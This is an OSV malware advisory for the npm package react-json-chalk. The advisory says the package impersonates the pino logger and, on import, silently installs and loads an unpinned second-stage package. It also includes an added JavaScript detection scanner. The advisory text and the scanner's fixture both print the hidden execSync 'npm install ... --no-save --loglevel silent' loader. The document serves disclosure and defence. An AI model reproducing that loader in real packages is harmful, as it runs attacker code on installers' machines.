MAL-2026-4792

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-json-chalk/MAL-2026-4792.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4792
Published
2026-05-26T08:46:33Z
Modified
2026-06-12T20:01:55.701582873Z
Summary
Malicious code in react-json-chalk (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77)

The package is published as react-json-chalk, but its main entry (pino.js) impersonates the pino logger: it carries pino's homepage (https://getpino.io), a bundled copy of the pino source tree, and a misappropriated description. On require('react-json-chalk'), pino.js immediately loads lib/writer.js. At module top level, writer.js tries require('react-pinojs'); if that module is absent, it executes child_process.execSync("npm install react-pinojs --no-warnings --no-save --no-progress --loglevel silent") and then require('../../react-pinojs/pino.js'). The flags suppress install output and keep the dependency out of package.json, so consumers get no visible signal that a second package was fetched. The fetched dependency is unpinned, fully controlled by whoever publishes react-pinojs, and its code runs as part of the require() of this package: arbitrary attacker code on the installer's machine on every import. The same lib/writer.js defines getMacAddress(), which enumerates the MAC addresses of non-internal IPv4 interfaces, consistent with host fingerprinting handed off to the second stage. The package name/contents mismatch (a logger source tree under an unrelated name) is also a namespace-abuse / pino-impersonation pattern.
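A static triage check for the behaviour described above, added here as an example (it is not part of the advisory or of any scanner's code): it flags a child_process call that runs `npm install` at require time, the flags that hide that install, the "require, else install" fallback shape, and package.json metadata that names a different project. The file contents it scans are constructed fixtures shaped like the description, not the real package; the rule names and the heuristics are assumptions of this example.

```javascript
// Added triage check (not the advisory's code) for the self-installing second-stage
// pattern described above; file contents are CONSTRUCTED fixtures, not the real package.
// child_process call whose quoted command runs an npm install.
const INSTALL_CALL = /\b(?:execSync|exec|spawnSync|spawn|execFileSync)\s*\(\s*(['"`])([^'"`]*\bnpm\s+(?:install|i|add)\b[^'"`]*)\1/;
// Flags that hide the install from the consumer (quiet output, nothing written to package.json).
const STEALTH_FLAGS = ['--no-save', '--loglevel silent', '--no-progress', '--no-warnings'];
// try { require(...) } just before the install: the "install only if missing" shape.
const FALLBACK_REQUIRE = /try\s*\{[^}]*\brequire\s*\(/;

// Scan one JS source file; returns a finding object or null.
function scanSource(path, src) {
  const m = INSTALL_CALL.exec(src);
  if (!m) return null;
  const command = m[2];
  return {
    path, rule: 'runtime-npm-install', command,
    stealthFlags: STEALTH_FLAGS.filter((f) => command.includes(f)),
    fallbackRequire: FALLBACK_REQUIRE.test(src.slice(0, m.index)),
  };
}

// Heuristic identity checks on package.json: a homepage or main entry naming a
// different project is the impersonation signal the advisory points out.
function scanManifest(pkg) {
  const out = [];
  const base = pkg.name.replace(/^@[^/]+\//, '').toLowerCase();
  if (pkg.homepage && !pkg.homepage.toLowerCase().includes(base)) {
    out.push({ path: 'package.json', rule: 'homepage-name-mismatch', detail: pkg.homepage });
  }
  const mainBase = (pkg.main || 'index.js').split('/').pop().replace(/\.[cm]?js$/, '');
  if (mainBase !== 'index' && !base.includes(mainBase.toLowerCase())) {
    out.push({ path: 'package.json', rule: 'main-name-mismatch', detail: pkg.main });
  }
  return out;
}

// files: { relativePath: contents }. Returns every finding for the package.
function scanPackage(files) {
  const out = [];
  for (const [path, src] of Object.entries(files)) {
    if (path === 'package.json') out.push(...scanManifest(JSON.parse(src)));
    else if (/\.[cm]?js$/.test(path)) { const f = scanSource(path, src); if (f) out.push(f); }
  }
  return out;
}

// Constructed fixture mirroring the advisory's description (hypothetical contents).
const SAMPLE_PACKAGE = {
  'package.json': JSON.stringify({ name: 'react-json-chalk', main: 'pino.js', homepage: 'https://getpino.io' }),
  'lib/writer.js': "const { execSync } = require('child_process');\n" +
    "let s; try { s = require('react-pinojs'); } catch (e) {\n" +
    "  execSync('npm install react-pinojs --no-warnings --no-save --no-progress --loglevel silent');\n" +
    "  s = require('../../react-pinojs/pino.js'); }\n",
};
console.log(JSON.stringify(scanPackage(SAMPLE_PACKAGE), null, 2));
```

Run against an unpacked tarball, the three findings (two manifest mismatches plus the runtime install with all four stealth flags and the fallback require) are the signal to quarantine the package before any install script or require() runs it.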

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "c3411327be0927b7a726464d2bd9a590ff4ca61bc08e9170e4c0e482dc18dac2",
            "id": "IN-MAL-2026-004875",
            "source": "amazon-inspector",
            "modified_time": "2026-05-26T08:46:33Z",
            "versions": [
                "13.4.4"
            ],
            "import_time": "2026-05-26T09:17:32.746004914Z"
        },
        {
            "sha256": "1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77",
            "import_time": "2026-06-12T19:43:35.084546687Z",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:02:15Z",
            "versions": [
                "13.4.6"
            ],
            "id": "IN-MAL-2026-005803"
        }
    ]
}
References
Credits

Affected packages

npm / react-json-chalk

Package

Affected ranges

Affected versions

13.*
13.4.4
13.4.6

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-json-chalk/MAL-2026-4792.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "sha256": "1ab7958719307e09d349a855f54b59c7e5fe94d2f00b05440e2669b702514c7d",
            "tlsh": "05318bd78245a278f3b06aa10e5fa0d1b186e12521507dd83ffc84c367ab4e04ed4fd6",
            "path": "lib/writer.js"
        },
        {
            "sha256": "9b2a5f6bbbfa55f7db60f3e83edf0a71ddf98c5a2830aedcb35af2bd7a9b338e",
            "tlsh": "dc018925ce785da308ec248548290252aa60ed6b584cfd5973d7a32c0f4e5bf68be1ad",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "react-json-chalk-13.4.4.tgz",
            "hashes": {
                "sha1": "724a5212fe4047aca98aa934b3032af19109a35d",
                "sha512_sri": "sha512-oos+FlJaUor3f0YgPAwsmL5gu2ba8WcmyDcObhNNH250f40/6SznsPt4RF5Uc2NRWKKrLpb3zWkWRyluWtXHzQ=="
            }
        }
    ]
}